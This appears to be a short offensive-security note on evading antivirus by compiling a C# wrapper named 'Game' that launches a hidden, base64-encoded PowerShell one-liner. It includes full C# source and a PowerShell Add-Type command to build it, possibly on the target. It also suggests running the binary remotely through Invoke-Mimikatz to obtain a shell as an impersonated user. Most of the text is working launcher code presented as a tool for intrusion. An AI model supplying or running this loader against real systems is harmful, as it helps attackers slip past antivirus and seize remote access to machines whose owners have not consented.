C# can be used to bypass AV (at least as of September 2022) — just create a C# wrapper that fires up a PowerShell one-liner. (Sometimes this will need to be modified slightly to bypass AV, but generally you don’t have to tweak this code much — C# analysis doesn’t seem to be particularly robust for most AV products.)
using System;
namespace Game
{
public class Program
{
public static void Main() {
System.Diagnostics.Process P = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo SI = new System.Diagnostics.ProcessStartInfo();
SI.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
SI.FileName = "powershell.exe";
SI.Arguments = "-enc $BASE64_ENCODED_SCRIPT_TO_RUN";
P.StartInfo = SI;
P.Start();
}
}
}This can be compiled using PowerShell — perhaps even on the target itself. What’s the advantage to doing this? You can use Invoke-Mimikatz to run this binary remotely to quickly obtain a remote shell with the permissions of the user you’re impersonating.
$code = @"
using System;
namespace Game
{
public class Program
{
public static void Main() {
System.Diagnostics.Process P = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo SI = new System.Diagnostics.ProcessStartInfo();
SI.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
SI.FileName = "powershell.exe";
SI.Arguments = "-enc $BASE64_ENCODED_SCRIPT_TO_RUN";
P.StartInfo = SI;
P.Start();
}
}
}
"@
Add-Type -outputtype consoleapplication -outputassembly $BINARY_NAME -TypeDefinition $code -Language CSharp